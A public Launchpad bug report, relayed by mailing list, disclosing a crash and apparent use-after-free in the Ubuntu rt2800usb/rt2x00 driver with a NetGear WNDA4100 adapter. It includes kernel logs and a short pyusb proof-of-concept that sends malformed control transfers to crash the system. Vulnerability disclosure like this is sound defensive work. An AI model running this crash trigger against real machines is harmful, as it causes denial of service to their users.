This issue was reported publicly to https://lore.kernel.org/linux- wireless/caov16xesck0-smenjfxvwikqogbj4pqwa2dvjbvwq-g+ntv...@mail.gmail.com/T/#u
Therefore, I am making this bug report public as well. The new report claims that "Debian systems are not affected.". If Ubuntu is truly the only distro affected, the Canonical CNA can assign a CVE. Otherwise, CVE assignment should be made by upstream, MITRE, or a Root CNA like Red Hat. To restate this, it is not known if Ubuntu is an affected downstream of this vulnerability or if the issue truly originates in Ubuntu as the upstream provider. My hunch is the prior. ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Kernel Packages, which is subscribed to linux in Ubuntu. https://bugs.launchpad.net/bugs/2073500 Title: Ubuntu RT2x00 USB Driver Kernel Use-After-Free Vulnerability Status in linux package in Ubuntu: New Bug description: Description: While performing USB interface fuzzing tests on a NetGear WNDA4100 network card (Bus 001 Device 018: ID 0846:9013), I observed a system crash on multiple PCs running Ubuntu 22.04. The issue appears to be related to the USB drivers or kernel handling of the device, as indicated by the kernel logs. Impact: Affected systems include Ubuntu 22.04 running on different hardware configurations with the NetGear WNDA4100 network card. This vulnerability may allow an attacker to trigger a system crash through the USB interface, leading to denial of service. Reproduction Steps: Connect the NetGear WNDA4100 network card (ID 0846:9013) to a system running Ubuntu 22.04. Run the provided fuzzing script to interact with the USB interface of the network card. Observe the system behavior and check for crashes or instability. Logs and Error Messages: The following are excerpts from the kernel log during the crash: [ +0.351900] ------------[ cut here ]------------ [ +0.000003] WARNING: CPU: 3 PID: 0 at kernel/time/timer.c:1738 __run_timers+0x2dd/0x310 [ +0.000007] Modules linked in: veth xt_nat xt_tcpudp xt_conntrack nft_chain_nat xt_MASQUERADE nf_nat nf_conntrack_netlink nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 xfrm_user tls xfrm_algo xt_addrtype nft_compat nf_tables libcrc32c nfnetlink br_netfilter bridge stp llc ccm snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_sof_pci_intel_tgl snd_sof_intel_hda_common soundwire_intel snd_sof_intel_hda_mlink soundwire_cadence snd_sof_intel_hda snd_sof_pci intel_uncore_frequency snd_sof_xtensa_dsp intel_uncore_frequency_common joydev overlay snd_sof snd_sof_utils snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi soundwire_generic_allocation soundwire_bus snd_soc_core snd_compress ac97_bus snd_pcm_dmaengine snd_hda_intel snd_intel_dspcfg snd_intel_sdw_acpi x86_pkg_temp_thermal snd_hda_codec intel_powerclamp coretemp snd_hda_core snd_hwdep snd_pcm kvm_intel snd_seq_midi i915 kvm snd_seq_midi_event rt2800usb snd_rawmidi uvcvideo irqbypass iwlmvm rt2x00usb crct10dif_pclmul rt2800lib [ +0.000034] polyval_clmulni videobuf2_vmalloc polyval_generic drm_buddy uvc ghash_clmulni_intel rt2x00lib videobuf2_memops sha256_ssse3 ttm snd_seq videobuf2_v4l2 sha1_ssse3 aesni_intel binfmt_misc mei_hdcp mei_pxp drm_display_helper crypto_simd videodev snd_seq_device pmt_telemetry cryptd mac80211 iwlwifi pmt_class intel_rapl_msr nls_iso8859_1 cmdlinepart input_leds snd_timer cec rapl huawei_wmi videobuf2_common processor_thermal_device_pci ledtrig_audio spi_nor rc_core processor_thermal_device intel_cstate wmi_bmof sparse_keymap libarc4 serio_raw mc snd cfg80211 drm_kms_helper mei_me mtd processor_thermal_rfim hid_multitouch processor_thermal_mbox i2c_algo_bit mei soundcore processor_thermal_rapl intel_vsec intel_rapl_common int3400_thermal int3403_thermal int340x_thermal_zone acpi_thermal_rel mac_hid acpi_pad sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic nvme crc32_pclmul nvme_core spi_intel_pci intel_lpss_pci i2c_i801 spi_intel xhci_pci intel_lpss nvme_common [ +0.000042] i2c_smbus xhci_pci_renesas idma64 i2c_hid_acpi i2c_hid video hid wmi pinctrl_tigerlake [ +0.000005] CPU: 3 PID: 0 Comm: swapper/3 Not tainted 6.5.0-35-generic #35~22.04.1-Ubuntu [ +0.000002] Hardware name: HONOR GLO-GXXX/GLO-GXXX-PCB, BIOS 1.09 06/27/2023 [ +0.000000] RIP: 0010:__run_timers+0x2dd/0x310 [ +0.000003] Code: 3e 02 48 85 c0 74 0c 48 8b 78 08 4c 89 ee e8 ba cf ff ff 65 ff 0d 2b 1e 44 57 0f 85 38 ff ff ff 0f 1f 44 00 00 e9 2e ff ff ff <0f> 0b e9 0b ff ff ff 41 0f b6 5f 26 80 fb 01 0f 87 44 da ec 00 83 [ +0.000001] RSP: 0018:ffffaedb4048cea0 EFLAGS: 00010046 [ +0.000001] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ +0.000001] RDX: ffffaedb4048ced0 RSI: 00000000ffff7618 RDI: 0000000000000000 [ +0.000001] RBP: ffffaedb4048cf48 R08: 0000000000000000 R09: ffff8e5c8f8e11a8 [ +0.000000] R10: 0000000000000000 R11: 0000000000000000 R12: dead000000000122 [ +0.000001] R13: ffff8e551284a4b0 R14: ffffaedb4048ced0 R15: ffff8e5c8f8e1180 [ +0.000001] FS: 0000000000000000(0000) GS:ffff8e5c8f8c0000(0000) knlGS:0000000000000000 [ +0.000000] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ +0.000001] CR2: 00005785fd8f0000 CR3: 000000026241c000 CR4: 0000000000750ee0 [ +0.000001] PKRU: 55555554 [ +0.000001] Call Trace: [ +0.000001] <IRQ> [ +0.000002] ? show_regs+0x6d/0x80 [ +0.000003] ? __warn+0x89/0x160 [ +0.000002] ? __run_timers+0x2dd/0x310 [ +0.000002] ? report_bug+0x17e/0x1b0 [ +0.000003] ? handle_bug+0x46/0x90 [ +0.000002] ? exc_invalid_op+0x18/0x80 [ +0.000001] ? asm_exc_invalid_op+0x1b/0x20 [ +0.000004] ? __run_timers+0x2dd/0x310 [ +0.000002] run_timer_softirq+0x1d/0x40 [ +0.000002] __do_softirq+0xd9/0x349 [ +0.000002] ? hrtimer_interrupt+0x11f/0x250 [ +0.000002] __irq_exit_rcu+0x75/0xa0 [ +0.000002] irq_exit_rcu+0xe/0x20 [ +0.000001] sysvec_apic_timer_interrupt+0x92/0xd0 [ +0.000001] </IRQ> [ +0.000001] <TASK> [ +0.000000] asm_sysvec_apic_timer_interrupt+0x1b/0x20 [ +0.000002] RIP: 0010:cpuidle_enter_state+0xda/0x720 [ +0.000001] Code: 16 06 ff e8 a8 f5 ff ff 8b 53 04 49 89 c7 0f 1f 44 00 00 31 ff e8 16 c2 04 ff 80 7d d0 00 0f 85 61 02 00 00 fb 0f 1f 44 00 00 <45> 85 f6 0f 88 f7 01 00 00 4d 63 ee 49 83 fd 09 0f 87 19 05 00 00 [ +0.000001] RSP: 0018:ffffaedb4017fe18 EFLAGS: 00000246 [ +0.000001] RAX: 0000000000000000 RBX: ffffcedb3fac0728 RCX: 0000000000000000 [ +0.000001] RDX: 0000000000000003 RSI: 0000000000000000 RDI: 0000000000000000 [ +0.000000] RBP: ffffaedb4017fe68 R08: 0000000000000000 R09: 0000000000000000 [ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffffaaed1d60 [ +0.000000] R13: 0000000000000002 R14: 0000000000000002 R15: 000000250034e01b [ +0.000002] ? cpuidle_enter_state+0xca/0x720 [ +0.000001] ? finish_task_switch.isra.0+0x85/0x2a0 [ +0.000002] cpuidle_enter+0x2e/0x50 [ +0.000002] call_cpuidle+0x23/0x60 [ +0.000002] cpuidle_idle_call+0x11d/0x190 [ +0.000001] do_idle+0x82/0xf0 [ +0.000001] cpu_startup_entry+0x2a/0x30 [ +0.000001] start_secondary+0x129/0x160 [ +0.000003] secondary_startup_64_no_verify+0x190/0x19b [ +0.000003] </TASK> [ +0.000000] ---[ end trace 0000000000000000 ]--- [ +0.967206] ieee80211 phy6: rt2800_wait_csr_ready: Error - Unstable hardware [ +0.000009] ieee80211 phy6: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5) [ +0.180377] usb 3-3: reset high-speed USB device number 5 using xhci_hcd [ +0.160690] ieee80211 phy7: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected [ +0.012183] ieee80211 phy7: rt2x00_set_rf: Info - RF chipset 000d detected [ +0.000223] ieee80211 phy7: Selected rate control algorithm 'minstrel_ht' [ +0.001495] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0 [ +0.036098] ieee80211 phy7: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin' [ +0.000043] ieee80211 phy7: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36 [ +0.102320] ieee80211 phy7: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting [ +0.000005] ieee80211 phy7: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5) [ +0.194308] usb 3-3: reset high-speed USB device number 5 using xhci_hcd [ +0.164912] ieee80211 phy8: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected [ +0.011684] ieee80211 phy8: rt2x00_set_rf: Info - RF chipset 000d detected [ +0.000212] ieee80211 phy8: Selected rate control algorithm 'minstrel_ht' [ +0.001410] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0 [ +0.025662] ieee80211 phy8: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin' [ +0.000039] ieee80211 phy8: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36 [ +0.105379] ieee80211 phy8: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting [ +0.000005] ieee80211 phy8: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5) [ +0.178163] usb 3-3: reset high-speed USB device number 5 using xhci_hcd [ +0.157165] ieee80211 phy9: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected [ +0.011625] ieee80211 phy9: rt2x00_set_rf: Info - RF chipset 000d detected [ +0.000212] ieee80211 phy9: Selected rate control algorithm 'minstrel_ht' [ +0.001473] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0 [ +0.040515] ieee80211 phy9: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin' [ +0.000062] ieee80211 phy9: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36 [ +0.094392] ieee80211 phy9: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting [ +0.000006] ieee80211 phy9: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5) [ +0.178165] usb 3-3: reset high-speed USB device number 5 using xhci_hcd [ +0.158058] ieee80211 phy10: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected [ +0.012091] ieee80211 phy10: rt2x00_set_rf: Info - RF chipset 000d detected [ +0.000209] ieee80211 phy10: Selected rate control algorithm 'minstrel_ht' [ +0.001250] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0 [ +0.047440] ieee80211 phy10: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin' [ +0.000070] ieee80211 phy10: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36 POC: -------------------------------------------------------------------------------------------------------- import usb.core import usb.util import time import random dev = usb.core.find(idVendor=0x0846, idProduct=0x9013) if dev is None: raise ValueError("Device not found") def send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length): try: data = bytes([0xFF] * data_length) #print(f"Sending: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data length={data_length}") send = dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data) print(f"Response length: {len(send)}") if len(send) > 300: print(f"Received data length > 300: {len(send)}") print(f"Sent data: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data length={data_length}") return True except Exception as e: print(f"Error: {e}") return False requests = [ (0x00, 0x00, 0x0000, 0x0000, 64), (0x00, 0x00, 0x0000, 0x0000, 1024), (0x00, 0x00, 0x0000, 0x0000, 2048), (0x00, 0x00, 0x0000, 0x0000, 512), (0x00, 0x00, 0x0000, 0xFFFF, 64), (0x00, 0x00, 0x0000, 0xFFFF, 1024), (0x00, 0x00, 0x0000, 0xFFFF, 2048), (0x00, 0x00, 0x0000, 0xFFFF, 512), ] for bmRequestType, bRequest, wValue, wIndex, data_length in requests: send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length) time.sleep(0.1) dev.reset() print("Done sending specified requests.") --------------------------------------------------------------------------------------- I was able to reproduce the issue successfully on both Dell Vostro and Honor laptops running Ubuntu 22.04. However, the issue only occurs when a NetGear, Inc. WNDA4100 wireless adapter is plugged in. It is currently unclear whether the problem is due to the NetGear wireless adapter itself or the rt2800 driver, as I do not have additional RT2800 wireless adapters to test with. The vulnerability indeed exists and can cause the local PC to crash completely. I believe it is highly likely that the issue is due to the RT2800 driver. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2073500/+subscriptions -- Mailing list: https://launchpad.net/~kernel-packages Post to : kernel-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~kernel-packages More help : https://help.launchpad.net/ListHelp
